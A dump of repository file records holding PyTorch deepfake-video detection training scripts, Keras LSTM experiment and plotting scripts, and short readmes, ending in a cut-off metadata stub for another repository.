"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/Deepfake video detection model/readme.txt",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "Deepfake video detection model\n"
},
{
"alpha_fraction": 0.6173622012138367,
"alphanum_fraction": 0.6400774717330933,
"avg_line_length": 35.86274337768555,
"blob_id": "943cc2144524459b9e5956a241a751b65dd2c4a6",
"content_id": "c48b706bd755d7ae7e73e6e23a157efe31da70ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5679,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 153,
"path": "/Deepfake video detection model/deepfake_new.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import os\nfrom PIL import Image\nfrom function import *\nimport numpy as np\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom xception import xception\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport cv2\nimport argparse\nimport datetime\nimport pandas as pd\nfrom tensorboardX import SummaryWriter\n\n\n\ntorch.cuda.empty_cache()\nuse_cuda = torch.cuda.is_available() \nprint(use_cuda) # check if GPU exists\n#device = torch.device(\"cuda:0\" if use_cuda else \"cpu\") # use CPU or GPU\ndevice=torch.device('cuda:0')\ntorch.backends.deterministic = True\n\nparser = argparse.ArgumentParser()\n#parser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--batch_size', type=int, default=16, help='batch size')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate')\nparser.add_argument('--seed', type=int, default=1, help='manual seed')\n#parser.add_argument('--it_start', type=int, default=1, help='number of itr to start with')\n#parser.add_argument('--it_end', type=int, default=10000, help='number of itr to end with')\nparser.add_argument('--signature', default=str(datetime.datetime.now()))\n# parser.add_argument('--data_dir', help='directory for data')\nparser.add_argument('--save_dir', default='/mnt/gs18/scratch/users/asnanivi/runs', help='directory for result')\nopt = parser.parse_args()\nprint(opt)\n\nsig = str(datetime.datetime.now())\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.gpu)\nrandom.seed(opt.seed)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed_all(opt.seed)\n#os.makedirs('%s/modules/%s' % (opt.save_dir, sig), exist_ok=True)\n\nCNN_embed_dim = 2048\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\ndropout_p = 0.0\nk=2\n\n\nprint(\"Initializing Networks\")\ncnn_encoder = xception(2, load_pretrain=True).to(device)\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs!\")\n cnn_encoder = nn.DataParallel(cnn_encoder)\n rnn_decoder = nn.DataParallel(rnn_decoder)\n\ncrnn_params = list(cnn_encoder.parameters()) + list(rnn_decoder.parameters())\n#optimizer_xcp = optim.Adam(model.parameters(), lr=opt.lr)\n#model.cuda()\noptimizer = torch.optim.Adam(crnn_params, lr=opt.lr)\ncse_loss = nn.CrossEntropyLoss().cuda()\n\ndef train(batch, label):\n #model.train()\n cnn_encoder.train()\n rnn_decoder.train()\n temp=cnn_encoder(batch)\n temp=torch.unsqueeze(temp,0)\n temp=temp.permute(1,0,2)\n output = rnn_decoder(temp)\n loss = cse_loss(output, label.type(torch.cuda.LongTensor))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return[loss.item()]\n\n\ndef write_tfboard(vals, itr, name):\n for idx, item in enumerate(vals):\n writer.add_scalar('data/%s%d' % (name, idx), item, itr)\n\nmain_dir=\"/mnt/scratch/asnanivi/frame_data/frame_data\"\nmetadata_dir=\"/mnt/gs18/scratch/users/asnanivi/1\"\nwriter = SummaryWriter('%s/logs/%s' % (opt.save_dir, sig))\n#folder=next(os.walk(main_dir))\nfolders=[\"dfdc_train_part_14\",\"dfdc_train_part_15\",\"dfdc_train_part_16\",\"dfdc_train_part_17\"]\n#onlyfiles = next(os.walk(os.path.join(main_dir,folder[0],folder[0],\"Fake\")))[2]\n#print(len(onlyfiles))\n\nstate = {\n 'state_dict_cnn':cnn_encoder.state_dict(),\n 'state_dict_rnn': rnn_decoder.state_dict(),\n 'optimizer': 
optimizer.state_dict(),\n \n}\n\n\nstate1 = torch.load('/mnt/gs18/scratch/users/asnanivi/runs/logs/2020-03-24 20:51:46.488354/99000-dfdc_train_part_06.pickle')\nrnn_decoder.load_state_dict(state1['state_dict_rnn'])\noptimizer.load_state_dict(state1['optimizer'])\ncnn_encoder.load_state_dict(state1['state_dict_cnn'])\n\nfor foldername in folders:\n imagefiles = next(os.walk(os.path.join(main_dir,foldername)))[2]\n imagefiles=sorted(imagefiles)\n metadata=pd.read_json(metadata_dir + '/'+foldername +\"/metadata.json\", orient='index')\n i=0\n prev_file=imagefiles[0]\n print(prev_file.split(\"_\")[0])\n flag=0\n while i<len(imagefiles):\n j=0\n images=[]\n y_train=np.ones((30),dtype=float)\n while j<30 and i<len(imagefiles):\n images.append(cv2.imread(os.path.join(main_dir,foldername,imagefiles[i])))\n if imagefiles[i].split(\"_\")[0]!=prev_file.split(\"_\")[0] or flag==0:\n for index, row in metadata.iterrows():\n if index.split(\".\")[0]==imagefiles[i].split(\"_\")[0]:\n if row[0]==\"FAKE\":\n y_train[j]=0\n elif row[0]==\"REAL\":\n y_train[j]=1\n y_prev=y_train[j]\n flag=1\n \n else:\n y_train[j]=y_prev\n print(imagefiles[i])\n if i%250==0: \n print(imagefiles[i].split(\"_\")[0],y_train[j])\n j=j+1\n i=i+1\n print(y_train)\n images = np.array(images)\n Y_train=np.array(y_train[0:j])\n X_train=torch.from_numpy(images).permute(0,3,1,2)\n X_train=X_train.byte()\n #print(X_train.shape)\n #train = torch.utils.data.TensorDataset(torch.from_numpy(images), torch.from_numpy(Y_train))\n loss = train(torch.from_numpy(images).permute(0,3,1,2), torch.from_numpy(Y_train))\n write_tfboard([loss[0]], i, name='TRAIN')\n if i % 900 == 0:\n torch.save(state, '%s/logs/%s/%d-%s.pickle' % (opt.save_dir, sig, i,foldername))\n print(\"Save Model: {:d}\".format(i))\n \n \n \n "
},
{
"alpha_fraction": 0.4758228361606598,
"alphanum_fraction": 0.5253961682319641,
"avg_line_length": 29.75,
"blob_id": "7683d67c0727e8f1dd403e8008978697b4a1cbe1",
"content_id": "7bb100a34fa06854b6bac0e27d3419c99903e3bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2461,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 80,
"path": "/Modified LSTM RNN/draw_class.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pylab\nimport os\nimport pickle\n# the following pylab command is needed to run on the Google Cloud!\npylab.switch_backend('agg')\n#\n#\nclrs = [np.array([0.000, 1.000, 0.000]), np.array([0.000, 1.000, 1.000]),\n np.array([0.000, 0.000, 1.000]), np.array([0.980, 0.502, 0.447]),\n np.array([1.000, 0.000, 0.000]), np.array([1.000, 0.000, 1.000]),\n np.array([0.000, 1.000, 1.000]), np.array([0.236, 0.123, 0.110])]\n\nclass LSTMs():\n \n def __init__(self, path, act, eta):\n self.path = path\n self.act = act\n self.eta = eta\n self.max_val_accs = []\n os.chdir(path)\n \n def draw(self, lstms, epoch):\n \n pylab.figure(1 , figsize=(6,6))\n pylab.subplot(211)\n epc = np.arange(1,epoch+1)\n \n \n for i, lstm in enumerate(lstms):\n lstmp = '%s.p' % lstm\n lstmi = pickle.load(open( lstmp, \"rb\" ))\n acci = lstmi['acc']\n pylab.plot(epc, acci, c=clrs[i], label=lstm) \n #max_acci = max(acci)\n #t = lstm,max_acci\n pylab.legend(loc='best')\n pylab.ylabel('training accuracy')\n pylab.xlabel('epoch')\n pylab.title('eta = %.4g - %s'% (self.eta, self.act))\n pylab.grid()\n \n pylab.subplot(212)\n for i, lstm in enumerate(lstms):\n lstmp = '%s.p' % lstm\n lstmi = pickle.load(open( lstmp, \"rb\" ))\n val_acci = lstmi['val_acc']\n pylab.plot(epc, val_acci, c=clrs[i], label=lstm)\n max_val_acci = max(val_acci)\n t = lstm, max_val_acci\n self.max_val_accs.append(t)\n pylab.ylabel('testing accuracy')\n pylab.xlabel('epoch')\n pylab.grid()\n# \n fig_name = '%s-eta%.4g.png'% (self.act , self.eta)\n pylab.savefig(fig_name)\n \n def get_max(self):\n # for now run draw class first, to get lstms pickle\n print ('eta = %.4g, act = %s' % (eta,act))\n for e in self.max_val_accs:\n print('max val_acc of {} : {}'.format(e[0],e[1]))\n \n\n \n\n#%% \nact = 'sigmoid'\neta = 2e-3\npath = 'YOUR_path_to_the_results_Folder/%s-eta%.4g'% (act , eta) \n\nlstms = LSTMs(path, act, eta)\n#list the binary dot_p files in the folder that need to be plotted\n\nl= ['lstm0', 'lstm6', 'lstm10']\n#Number of epochs must match the # in the binary file\nepoch = 100\nlstms.draw(l, epoch)\nlstms.get_max()\n\n"
},
{
"alpha_fraction": 0.8888888955116272,
"alphanum_fraction": 0.8888888955116272,
"avg_line_length": 35,
"blob_id": "e59e624498b468e0cfcb0dbc325bb354067be95b",
"content_id": "b26cf8705312cfd158756de7cc000c9ffc0f4874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 1,
"path": "/Framework for information retrieval/readme.txt",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "Framework for information retrieval\n"
},
{
"alpha_fraction": 0.6164183616638184,
"alphanum_fraction": 0.6421267986297607,
"avg_line_length": 31.60952377319336,
"blob_id": "78c3d1323242c567a0f0195aadc11ab90c04b05b",
"content_id": "40fc9a6cf66970c20edb08a02cd86265f84ff68b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3423,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 105,
"path": "/Modified LSTM RNN/SLIM21_run_example.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "#%%\n\"\"\"\n(Now using slim21 module, which is compatible with Keras2.1--backend: Tensorflow)\n\nSample script for importing the SLIM21 models and executing multiple training/\ntesting. \nResults are saved/dumpped in binary files in a folder. \nThen, one uses the \nDRAW\nscript to plot the results\n\nCSANN LAB--MSU--msu.edu\nContributors:\nAtra Akandeh\nFathi Salem\n...\n\n\"\"\"\nfrom __future__ import print_function\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.layers.embeddings import Embedding\n#from keras.layers import LSTM\nimport numpy as np\n## The following is used only ofr Theano backend\n##from theano.tensor.shared_randomstreams import RandomStreams\n##\nimport pickle\nimport os.path\n#\n##Replace the following path with your own folders/directory where \n##the module slim21.py is located\npth = 'C:/Users/salem.ECE451/KERAS2/keras21/New'\npth1 = 'C:/Users/salem.ECE451/KERAS2/keras21/New/Results/'\nos.chdir(pth)\n##\nfrom slim21 import LSTMs\n#\n\n#np.random.seed(3)\n#srgn = RandomStreams(3)\n\nbatch_size = 32\nnb_classes = 2\nnb_epochs = 1\nhidden_units = 400\nembedding_vector_length = 32\n\n# load the dataset but only keep the top n words, zero the rest\ntop_words = 5000\n# the data, shuffled and split between train and test sets\n(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)\n\n\n# truncate and pad input sequences\nmax_review_length = 500\nX_train = sequence.pad_sequences(X_train, maxlen=max_review_length)\nX_test = sequence.pad_sequences(X_test, maxlen=max_review_length)\n\n## This is for comment%%\n\nacts = ['sigmoid' , 'tanh']\n#include all your models ina list\nlstms = ['LSTM1'] #, 'LSTM2', 'LSTM3','LSTM4', 'LSTM5', 'LSTM6', 'LSTM4a', 'LSTM5a', 'LSTM10', 'LSTM11']\n#inlcude all your lr (grid) in a list\netas = [1.2e-5]\n#Use the name label of the model for the file\nnames = ['lstm1']#, 'lstm2', 'lstm3','lstm4', 'lstm5', 'lstm6', 'lstm4a', 'lstm5a', 'lstm10', 'lstm11']\n\nfor act in acts:\n for eta in etas:\n sub = '%s-eta%.4g' % (act,eta)\n \n if not os.path.exists(sub):\n os.mkdir(sub)\n print(\"Directory \" , sub , \" Created \")\n else: \n print(\"Directory \" , sub , \" already exists\")\n \n for cnt, lstm in enumerate(lstms):\n \n np.random.seed(3)\n##May use iF using RandomStreams in Theano \n# srgn = RandomStreams(3)\n#\n\n model = Sequential()\n model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length, trainable=False)) \n lstmi = LSTMs(implementation= 1, units=hidden_units,\n activation=act,\n input_shape=X_train.shape[1:], model=lstm)\n model.add(lstmi)\n model.add(Dense(1, activation=act))\n adam = Adam(lr=eta, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n model.compile(loss='binary_crossentropy', optimizer=adam , metrics=['accuracy'])\n model.summary()\n hist = model.fit(X_train, y_train, batch_size=batch_size, epochs=nb_epochs,\n verbose=1, validation_data=(X_test, y_test))\n fn = '%s.p' % names[cnt] \n final = os.path.join(pth + '/' +sub, fn)\n A = hist.history\n pickle.dump( A , open( final, \"wb\" ) )"
},
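The record above trains each LSTM variant over an activation/learning-rate grid and pickles the Keras `history.history` dict to `<act>-eta<lr>/<name>.p`. A minimal sketch of the follow-up plotting step (the "DRAW" script the docstring mentions), assuming that folder layout and whatever metric keys Keras put in the dumped dict:

```python
import os
import pickle
import matplotlib.pyplot as plt

# Paths mirroring the script above ('%.4g' % 1.2e-5 -> '1.2e-05'); adjust to your run.
results_dir = 'sigmoid-eta1.2e-05'
model_file = 'lstm1.p'

with open(os.path.join(results_dir, model_file), 'rb') as f:
    history = pickle.load(f)  # dict: metric name -> list of per-epoch values

for key, values in history.items():
    plt.plot(range(1, len(values) + 1), values, label=key)
plt.xlabel('epoch')
plt.legend()
plt.savefig(os.path.join(results_dir, 'lstm1.png'), dpi=300)
```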
{
"alpha_fraction": 0.5867123007774353,
"alphanum_fraction": 0.6047260165214539,
"avg_line_length": 33.51536560058594,
"blob_id": "6c85a69c21c41ce9490a9463a9e7b704d1d0657e",
"content_id": "39b84007211476c51eb21a8eae388dcec62be908",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14600,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 423,
"path": "/Deepfake video detection model/deepfake.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport torchvision\nfrom torch.autograd import Variable\nfrom function import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\nimport pickle\nfrom facenet_pytorch import MTCNN, InceptionResnetV1, extract_face\nimport pandas as pd\nimport json\nimport glob\nimport time\nimport cv2\nfrom matplotlib import pyplot as plt\n# Detect devices\ntorch.cuda.empty_cache()\nuse_cuda = torch.cuda.is_available() \nprint(use_cuda) # check if GPU exists\n#device = torch.device(\"cuda:0\" if use_cuda else \"cpu\") # use CPU or GPU\ndevice=torch.device('cuda:0')\nclass DetectionPipeline:\n \"\"\"Pipeline class for detecting faces in the frames of a video file.\"\"\"\n \n def __init__(self, detector, n_frames=30, batch_size=30, resize=1.4):\n \"\"\"Constructor for DetectionPipeline class.\n \n Keyword Arguments:\n n_frames {int} -- Total number of frames to load. These will be evenly spaced\n throughout the video. If not specified (i.e., None), all frames will be loaded.\n (default: {None})\n batch_size {int} -- Batch size to use with MTCNN face detector. (default: {32})\n resize {float} -- Fraction by which to resize frames from original prior to face\n detection. A value less than 1 results in downsampling and a value greater than\n 1 result in upsampling. (default: {None})\n \"\"\"\n self.detector = detector\n self.n_frames = n_frames\n self.batch_size = batch_size\n self.resize = resize\n \n def __call__(self, filename):\n \"\"\"Load frames from an MP4 video and detect faces.\n\n Arguments:\n filename {str} -- Path to video.\n \"\"\"\n # Create video reader and find length\n v_cap = cv2.VideoCapture(filename)\n v_len = int(v_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Pick 'n_frames' evenly spaced frames to sample\n if self.n_frames is None:\n sample = np.arange(0, v_len)\n else:\n sample = np.linspace(0, v_len - 1, self.n_frames).astype(int)\n\n # Loop through frames\n #faces = []\n face=[]\n frames = []\n faces = []\n required_size=(224, 224)\n flag=0\n for j in range(v_len):\n success = v_cap.grab()\n if j in sample:\n # Load frame\n success, frame = v_cap.retrieve()\n if not success:\n continue\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n \n # Resize frame to desired size\n if self.resize is not None:\n frame = frame.resize([int(d * self.resize) for d in frame.size])\n #frames.append(frame)\n\n # When batch is full, detect faces and reset frame list\n #if len(frames) % self.batch_size == 0 or j == sample[-1]:\n \n face=self.detector(frame)\n \n if flag==0:\n if face==None:\n face=torch.zeros([3,256,342],dtype=torch.float32)\n face_p=face\n else: \n face=torch.unsqueeze(face,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces=face\n \n #print(face.shape)\n if face!=None and flag!=0:\n face_p=face\n face=torch.unsqueeze(face,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces = torch.cat([face,faces], dim=0)\n if face==None and flag!=0:\n face=torch.unsqueeze(face_p,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces = torch.cat([face,faces], dim=0)\n flag=1\n \n #face=self.detector(frames)\n 
#faces.extend(face)\n #print(faces.shape)\n \n\n \n print(faces.shape)\n v_cap.release()\n\n return faces \ndef process_faces(faces, resnet):\n # Filter out frames without faces\n faces = [f for f in faces if f is not None]\n faces = torch.cat(faces).to(device)\n\n # Generate facial feature vectors using a pretrained model\n embeddings = resnet(faces)\n\n return embeddings\n\n# set path\n#data_path = \"./mnt/gnt/users/asnanivi/facebook data/dfdc_train_part_0/\" # define UCF-101 RGB data path\nsave_model_path = \"./CRNN_ckpt/\"\nDATA_FOLDER = '/mnt/gs18/scratch/users/asnanivi'\nTRAIN_SAMPLE_FOLDER = 'train_sample_videos'\n#TEST_FOLDER = 'test_videos'\n\n# EncoderCNN architecture\nCNN_fc_hidden1, CNN_fc_hidden2 = 1024, 768\nCNN_embed_dim = 512 # latent dim extracted by 2D CNN\nimg_x, img_y = 256, 342 # resize video 2d frame size\ndropout_p = 0.0 # dropout probability\n\n# DecoderRNN architecture\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\n\n# training parameters\nk = 101 # number of target category\nepochs = 10 # training epochs\nbatch_size = 30 \nlearning_rate = 1e-4\nlog_interval = 10 # interval for displaying training info\n\n# Select which frame to begin & end in videos\nbegin_frame, end_frame, skip_frame = 1, 29, 1\n\n\ndef train(log_interval, model, device, train_loader, optimizer, epoch):\n # set model as training mode\n cnn_encoder, rnn_decoder = model\n cnn_encoder.train()\n rnn_decoder.train()\n\n losses = []\n scores = []\n N_count = 0 # counting total trained sample in one epoch\n for batch_idx, (X, y) in enumerate(train_loader):\n # distribute data to device\n X, y = X.to(device), y.to(device).view(-1, )\n\n N_count += X.size(0)\n\n optimizer.zero_grad()\n output = rnn_decoder(cnn_encoder(X)) # output has dim = (batch, number of classes)\n\n loss = F.cross_entropy(output, y)\n losses.append(loss.item())\n\n # to compute accuracy\n y_pred = torch.max(output, 1)[1] # y_pred != output\n step_score = accuracy_score(y.cpu().data.squeeze().numpy(), y_pred.cpu().data.squeeze().numpy())\n scores.append(step_score) # computed on CPU\n\n loss.backward()\n optimizer.step()\n\n # show information\n if (batch_idx + 1) % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}, Accu: {:.2f}%'.format(\n epoch + 1, N_count, len(train_loader.dataset), 100. 
* (batch_idx + 1) / len(train_loader), loss.item(), 100 * step_score))\n\n return losses, scores\n\n\ndef validation(model, device, optimizer, test_loader):\n # set model as testing mode\n cnn_encoder, rnn_decoder = model\n cnn_encoder.eval()\n rnn_decoder.eval()\n\n test_loss = 0\n all_y = []\n all_y_pred = []\n with torch.no_grad():\n for X, y in test_loader:\n # distribute data to device\n X, y = X.to(device), y.to(device).view(-1, )\n\n output = rnn_decoder(cnn_encoder(X))\n\n loss = F.cross_entropy(output, y, reduction='sum')\n test_loss += loss.item() # sum up batch loss\n y_pred = output.max(1, keepdim=True)[1] # (y_pred != output) get the index of the max log-probability\n\n # collect all y and y_pred in all batches\n all_y.extend(y)\n all_y_pred.extend(y_pred)\n\n test_loss /= len(test_loader.dataset)\n\n # compute accuracy\n all_y = torch.stack(all_y, dim=0)\n all_y_pred = torch.stack(all_y_pred, dim=0)\n test_score = accuracy_score(all_y.cpu().data.squeeze().numpy(), all_y_pred.cpu().data.squeeze().numpy())\n\n # show information\n print('\\nTest set ({:d} samples): Average loss: {:.4f}, Accuracy: {:.2f}%\\n'.format(len(all_y), test_loss, 100* test_score))\n\n # save Pytorch models of best record\n torch.save(cnn_encoder.state_dict(), os.path.join(save_model_path, 'cnn_encoder_epoch{}.pth'.format(epoch + 1))) # save spatial_encoder\n torch.save(rnn_decoder.state_dict(), os.path.join(save_model_path, 'rnn_decoder_epoch{}.pth'.format(epoch + 1))) # save motion_encoder\n torch.save(optimizer.state_dict(), os.path.join(save_model_path, 'optimizer_epoch{}.pth'.format(epoch + 1))) # save optimizer\n print(\"Epoch {} model saved!\".format(epoch + 1))\n\n return test_loss, test_score\n\n\n\n#device = torch.device(\"cpu\")\n\n# Data loading parameters\nparams = {'batch_size': batch_size, 'shuffle': True, 'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n#print(params)\n\ntrain_list = list(os.listdir(os.path.join(DATA_FOLDER, TRAIN_SAMPLE_FOLDER)))\n\njson_file = [file for file in train_list if file.endswith('json')][0]\nprint(f\"JSON file: {json_file}\")\n\ndef get_meta_from_json(path):\n df = pd.read_json(os.path.join(DATA_FOLDER, path, json_file))\n df = df.T\n return df\n\nmeta_train_df = get_meta_from_json(TRAIN_SAMPLE_FOLDER)\nmeta_train_df.head()\nfilenames = glob.glob('/mnt/gs18/scratch/users/asnanivi/train_sample_videos/*.mp4')\nprint(len(filenames))\n\nlabels=[]\nfor fn in meta_train_df.index[:]:\n label = meta_train_df.loc[fn]['label']\n labels.append(label) \n \n \n\naction_names=[\"REAL\",\"FAKE\"] \n# convert labels -> category\nle = LabelEncoder()\nle.fit(action_names)\n\n# show how many classes there are\nlist(le.classes_)\n\n# convert category -> 1-hot\naction_category = le.transform(action_names).reshape(-1, 1)\nenc = OneHotEncoder()\nenc.fit(action_category)\n\n# # example\n# y = ['HorseRace', 'YoYo', 'WalkingWithDog']\n# y_onehot = labels2onehot(enc, le, y)\n# y2 = onehot2labels(le, y_onehot)\n \nall_y_list = labels2cat(le, labels) # all video labels\nall_Y=torch.LongTensor(all_y_list)\nprint(all_Y.shape)\n\n\ntransform = transforms.Compose([transforms.Resize([img_x, img_y]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nselected_frames = np.arange(begin_frame, end_frame, skip_frame).tolist()\n# Load face detector\nmtcnn = MTCNN(margin=14, keep_all=False, factor=0.5, device=device).eval()\n# Define face detection pipeline\ndetection_pipeline = DetectionPipeline(detector=mtcnn, batch_size=60, 
resize=0.25)\n\n# Load facial recognition model\nresnet = InceptionResnetV1(pretrained='vggface2', device=device).eval()\n#resnet=InceptionV3(input_shape=img_shape, weights='imagenet', include_top=False, pooling='avg')\n#X = torch.zeros([1334,30,3,256,342],dtype=torch.float64).to(device)\nX=[]\n#print(X.shape)\nstart = time.time()\nn_processed = 0\nflag1=0\nwith torch.no_grad():\n for i, filename in tqdm(enumerate(filenames), total=len(filenames)):\n try:\n \n # Load frames and find faces\n faces = detection_pipeline(filename)\n #X[i,:,:,:,:]=faces\n #waste=process_faces(faces, resnet)\n #print(waste.shape)\n #print(faces)\n # Calculate embeddings\n \n \n if flag1==0:\n faces=torch.unsqueeze(faces,dim=0)\n X=faces\n \n \n if flag1!=0:\n faces=torch.unsqueeze(faces,dim=0)\n X = torch.cat([faces,X], dim=0)\n \n flag1=1\n \n print(X.shape)\n \n \n except KeyboardInterrupt:\n print('\\nStopped.')\n break\n\n except Exception as e:\n print(e)\n #X.append(None)\nprint(\"final shape\") \nprint(X.shape) \ntrain_set= X,all_Y\ntrain_dataset = data.TensorDataset(X, all_Y)\n#print(train_set)\n#train_set= Variable(torch.from_numpy(X)),all_Y\n \n#valid_set=Dataset_CRNN(data_path, test_list, test_label, selected_frames, transform=transform)\ntrain_loader = data.DataLoader(train_dataset, **params)\n#valid_loader = data.DataLoader(valid_set, **params)\n\n#for batch_idx, (X, y) in enumerate(train_loader):\n# print(batch_idx)\n# print(X)\n# print(y)\n\n# Create model\ncnn_encoder = EncoderCNN(img_x=img_x, img_y=img_y, fc_hidden1=CNN_fc_hidden1, fc_hidden2=CNN_fc_hidden2,\n drop_p=dropout_p, CNN_embed_dim=CNN_embed_dim).to(device)\n\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\n\n# Parallelize model to multiple GPUs\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs!\")\n cnn_encoder = nn.DataParallel(cnn_encoder)\n rnn_decoder = nn.DataParallel(rnn_decoder)\n\ncrnn_params = list(cnn_encoder.parameters()) + list(rnn_decoder.parameters())\noptimizer = torch.optim.Adam(crnn_params, lr=learning_rate)\n\n\n# record training process\nepoch_train_losses = []\nepoch_train_scores = []\nepoch_test_losses = []\nepoch_test_scores = []\n\n# start training\nfor epoch in range(epochs):\n # train, test model\n train_losses, train_scores = train(log_interval, [cnn_encoder, rnn_decoder], device, train_loader, optimizer, epoch)\n print(epoch, \"starting\")\n # save results\n epoch_train_losses.append(train_losses)\n epoch_train_scores.append(train_scores)\n \n # save all train test results\n A = np.array(epoch_train_losses)\n B = np.array(epoch_train_scores)\n print(epoch ,\"done\")\n print(\"loss\", A)\n print(\"scores\",B)\n np.save('/mnt/ufs18/home-188/asnanivi/Desktop/Deepfake/result', A)\n np.save('/mnt/ufs18/home-188/asnanivi/Desktop/Deepfake/result', B)\n \n\n# plot\nfig = plt.figure(figsize=(10, 4))\nplt.subplot(121)\nplt.plot(np.arange(1, epochs + 1), A[:, -1]) # train loss (on epoch end)\nplt.title(\"model loss\")\nplt.xlabel('epochs')\nplt.ylabel('loss')\nplt.legend(['train', 'test'], loc=\"upper left\")\n# 2nd figure\nplt.subplot(122)\nplt.plot(np.arange(1, epochs + 1), B[:, -1]) # train accuracy (on epoch end)\nplt.title(\"training scores\")\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.legend(['train', 'test'], loc=\"upper left\")\ntitle = \"./fig_UCF101_CRNN.png\"\nplt.savefig(title, dpi=600)\n# plt.close(fig)\nplt.show()\n"
}
] | 8 |
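`DetectionPipeline.__call__` in the record above grabs every frame but only decodes the `n_frames` indices chosen with `np.linspace`, which keeps decoding cost proportional to the sample size. A standalone sketch of that sampling pattern, independent of the MTCNN detector (the video path is a placeholder):

```python
import cv2
import numpy as np

def sample_frames(path, n_frames=30):
    """Decode n_frames evenly spaced frames from a video as RGB arrays."""
    cap = cv2.VideoCapture(path)
    total = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
    wanted = set(np.linspace(0, total - 1, n_frames).astype(int))
    frames = []
    for i in range(total):
        if not cap.grab():                  # cheap: advances without decoding
            break
        if i in wanted:
            ok, frame = cap.retrieve()      # decode only the frames we keep
            if ok:
                frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
    cap.release()
    return frames

# frames = sample_frames('example.mp4')  # placeholder path
```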
akakou/Incoming-WebHooks-Bot
|
https://github.com/akakou/Incoming-WebHooks-Bot
|
2462df844a5af4efe46f32530655a5488a8959a0
|
d725374e433fd4351bfced6fdf10f05b337737e5
|
4e4651e5c30788f5c7e93a5f486631520b08ce4d
|
refs/heads/master
| 2021-01-21T09:47:41.686680 | 2017-05-18T11:13:33 | 2017-05-18T11:13:33 | 91,668,223 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4797687828540802,
"alphanum_fraction": 0.4826589524745941,
"avg_line_length": 25.615385055541992,
"blob_id": "74d7a039a6f2d006e8b3dcf6c8dfd6aae5f28c6c",
"content_id": "af84b9ebc0ca9fab1b8e01bf2dfb1d12ca03cd75",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 692,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 26,
"path": "/incoming_webhooks.py",
"repo_name": "akakou/Incoming-WebHooks-Bot",
"src_encoding": "UTF-8",
